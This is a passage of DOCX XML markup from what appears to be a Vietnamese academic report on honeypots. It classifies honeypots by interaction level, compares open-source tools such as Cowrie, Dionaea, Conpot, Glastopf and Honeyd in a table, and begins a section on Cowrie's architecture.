        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Honeypot tương tác thấp (Low-Interaction Honeypots): Hệ thống chỉ mô phỏng các tầng giao thức mạng cơ bản (chẳng hạn như bắt tay TCP SYN-ACK hoặc trả lời các banner dịch vụ tĩnh). Hệ thống không có hệ điều hành thật hay shell dòng lệnh nào được thực thi. Điển hình cho dòng này là Honeyd. Ưu điểm là tiêu tốn cực ít tài nguyên phần cứng, an toàn tuyệt đối vì hacker không thể lợi dụng để phá hoại, nhưng nhược điểm là không thu thập được kịch bản tấn công phức tạp và rất dễ bị các công cụ quét chuyên nghiệp phát hiện (Fingerprinted).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Honeypot tương tác trung bình (Medium-Interaction Honeypots): Hệ thống mô phỏng một môi trường ứng dụng và hệ thống tệp tin giả lập đầy đủ hơn. Hệ thống có khả năng tương tác với kẻ tấn công thông qua các phiên bản giả lập của shell (như bash), cung cấp khả năng bắt giữ các tệp tin tải lên (payload downloading) và mô phỏng thành công các lỗ hổng dịch vụ phổ biến mà không cần chạy một hệ điều hành thực tế bên dưới. Cowrie và Dionaea là hai đại diện tiêu biểu nhất. Đây là giải pháp cân bằng hoàn hảo giữa độ an toàn và độ phong phú của dữ liệu thu thập được.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Honeypot tương tác cao (High-Interaction Honeypots): Hệ thống sử dụng máy ảo (Virtual Machine) hoặc máy chủ vật lý thực sự chạy hệ điều hành hoàn chỉnh (Real OS) và các dịch vụ thực tế để kẻ tấn công xâm nhập. Mọi hành vi của hacker đều được giám sát chặt chẽ từ bên ngoài thông qua hypervisor hoặc kernel hook. Nhược điểm lớn nhất là rủi ro an ninh rất cao: nếu cấu hình cô lập mạng không cẩn thận, kẻ tấn công có thể biến máy bẫy thành bàn đạp tấn công ngược lại toàn bộ hệ thống nội bộ của doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 2.1: Ma trận so sánh các dòng Honeypot mã nguồn mở phổ biến trên thế giới</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
        <w:gridCol w:w="1881"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dòng Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mức độ Tương tác</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Dịch vụ Mô phỏng Chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ưu điểm Vượt trội</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Hạn chế Chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dionaea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SMB, HTTP, FTP, TFTP, MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chuyên bắt giữ sâu mạng (Worms) và mã độc tự lây qua SMB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Không hỗ trợ tương tác dòng lệnh SSH chuyên sâu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cowrie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH, Telnet, SFTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Giả lập shell Linux chân thực, ghi log TTY chi tiết, lưu giữ mã độc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cần tinh chỉnh để tránh bị hacker phát hiện chữ ký mặc định.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Conpot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low-Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ICS/SCADA, Modbus, S7Comm, BACnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thu thập thông tin tấn công vào hạ tầng điều khiển công nghiệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chỉ phù hợp với hệ thống công nghiệp đặc thù.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Glastopf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low-Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Web Application, HTTP, Vulnerability emu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bắt các đợt quét lỗ hổng SQL Injection, LFI/RFI trên web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Đã ngừng phát triển tích cực, được thay thế bởi Snare/Tanner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Honeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low-Interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TCP/IP Stack, IP Daemons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mô phỏng hàng ngàn máy chủ ảo trên một địa chỉ IP duy nhất.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1881"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Không hỗ trợ tương tác ứng dụng thực tế.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3092335"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="hinh_2_1_phan_loai_honeypot.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 2.1: Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2 Kiến trúc và Cơ chế hoạt động của Cowrie SSH/Telnet Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cowrie là một hệ thống Medium-to-High Interaction Honeypot chuyên biệt cho việc giám sát giao thức SSH và Telnet, được phát triển dựa trên nền tảng framework Twisted của ngôn ngữ Python. Cowrie vốn được fork và nâng cấp toàn diện từ dự án Kippo nổi tiếng, bổ sung thêm hàng loạt tính năng hiện đại như hỗ trợ giao thức Telnet, giả lập SFTP, xuất log JSON thời gian thực và kiến trúc Proxy chuyển tiếp linh hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế hoạt động bên trong của Cowrie bao gồm các thành phần cốt lõi sau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Twisted Event-Driven Engine: Toàn bộ quá trình bắt tay SSH, trao đổi khóa mã hóa (Key Exchange), thương lượng thuật toán mã hóa đối xứng (Cipher Negotiation) và xác thực người dùng đều được xử lý bất đồng bộ bởi Twisted. Điều này cho phép Cowrie có thể duy trì hàng ngàn kết nối đồng thời từ các botnet mà không làm sụp đổ bộ nhớ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
